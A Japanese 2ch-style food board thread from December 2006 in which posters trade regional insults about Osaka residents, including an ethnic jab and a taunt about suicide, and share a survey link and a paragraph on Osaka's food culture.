  Λ_Λ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 <=( ´∀`) < ちなみに俺、神戸じゃないよw 北海道
 (    )  │
 | | |   \__________
 〈_フ__フ


357 :もぐもぐ名無しさん:2006/12/28(木) 10:42:58
>>354
お前は、プロファイラーか

358 ::2006/12/28(木) 10:44:21
いや、クルクルパーの粘着ボウヤやろね。

359 :もぐもぐ名無しさん:2006/12/28(木) 10:44:55
余裕が無いやつほど論破という単語を使いたがるのはわかった。

360 :もぐもぐ名無しさん:2006/12/28(木) 10:51:30
「論破」と言う文字に、異常な反応をするパブロフの韓トンカッペ君。

361 ::2006/12/28(木) 12:33:31
それに輪をかけて間抜けなオッサン。

362 :もぐもぐ名無しさん:2006/12/28(木) 12:52:06
大阪無職には論破なんて通用しないからね〜
論破ってのは議論の果ての結果であって馬鹿丸出しの中傷レスしか出来ない
大阪無職は議論の土俵にすら乗ってないからな

363 :もぐもぐ名無しさん:2006/12/28(木) 13:11:56
>>354
あらあらアンカーとか多用しちゃって・・こんなところに書き込むのに随分労力使ってますねw
しかも次のレスを心待ちにするあたり、相当お暇ですねwww

364 :もぐもぐ名無しさん:2006/12/28(木) 13:14:16
>>348
広島君久しぶり!元気にしてたか?w

365 :もぐもぐ名無しさん:2006/12/28(木) 15:28:22
>>363
反論マダーw

366 :もぐもぐ名無しさん:2006/12/28(木) 16:20:16
>>363
詭弁の特徴
 25:嘲笑で優位に立った様に振舞う


まあ、いくら薄汚い大阪人がホルホルしようと、言葉を書き込む事しかできない掲示板では
説得力のあることを書かない限り誰の賛同も得られませんよ。

367 :もぐもぐ名無しさん:2006/12/28(木) 16:36:47
>>366
君、相当お冠のようだが相手が大阪だと何故判る?

368 :もぐもぐ名無しさん:2006/12/28(木) 17:05:23
守貞漫稿みればいいかもね。

369 :もぐもぐ名無しさん:2006/12/28(木) 17:19:00
>>367
薄汚い大阪人登場w

370 :もぐもぐ名無しさん:2006/12/28(木) 18:52:09
ヴェーハッハッハ

by大阪人

371 :もぐもぐ名無しさん:2006/12/28(木) 19:09:21
>>370
おじいちゃん こんな処に迷い込んだらだめですよ。

                 By アルツハイマー病棟 婦長

372 :もぐもぐ名無しさん:2006/12/28(木) 19:15:04
>>367
なんだ、ここ数スレは大阪人であることを隠しもしなかったのにw
やっぱり大阪人であることを明かすとメチャメチャ叩かれるって分かってるんだなww
まあ、どっちにしろバレバレなんだけどねwww


373 :もぐもぐ名無しさん:2006/12/28(木) 19:34:57
大阪無職みたいな2ちゃんに粘着する無駄なエネルギーを発電とか何か
役に立つことに変換出来ないかな?

374 :もぐもぐ名無しさん:2006/12/28(木) 19:36:29
>>373
アホの考え休むに似たり
田舎に帰省する準備でもしとき

375 :もぐもぐ名無しさん:2006/12/28(木) 21:02:37
>>354
だーかーらーお前相当思い込み激しいんちゃう?w
別人は別人なの。たとえお前がどう思い込もうと。書いた本人が言ってるんだから間違いないだろww
それとこのスレじゃ神戸とかどうでもいいんだよ。もう一度スレタイ読んでみろやwww

376 :もぐもぐ名無しさん:2006/12/28(木) 21:06:37
>>375
あまり煽るなよ コピペで荒らしだすぞ

377 :もぐもぐ名無しさん:2006/12/28(木) 21:30:45
自分の住んでる所が好きかどうかのアンケート

関西在住者 好き 75.3%

関東在住者 好き 65.6%

ttp://www2.mdb-net.com/netsurvey/w_report/report45.html

378 :もぐもぐ名無しさん:2006/12/28(木) 21:57:35
昔から、大阪は 「食い倒れの町」といわれてきた。
食材の種類も多様で豊富、 しかもうまくて安い。
それには理由がある。
近世になると、全国の生産物の物流が盛んになり、
都の玄関口、大阪は地の利をいかして、集散地となって発展した。
海に面し、背後に山をひかえ、あらゆる自然の産物に恵まれ、
さらには遠隔地である北海道や北陸から穏やかな瀬戸内海を経た船便で、
さまざまな産品が集まった。
いわば大阪が全国の味覚の起点となったのである。
武士が少なく、権威や建て前をなんとも思わない実利重視の町民が、
今の言葉でいう手ごろな値段“reasonable price”に敏感になったのも当然だ。
うまいのは当たり前で、しかも安い、大阪の人々には、
いまもその血脈は受け継がれているといってよい。

379 :もぐもぐ名無しさん:2006/12/28(木) 23:07:38


参加者激減だな.いつもならスレ立てから半日で、
1000逝くんだが…


頭狂キモヲタにーと君、自殺したのかな?  
.笑

380 :もぐもぐ名無しさん:2006/12/28(木) 23:14:06
>>373
ゼロにいくら掛けてもゼロです

164 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)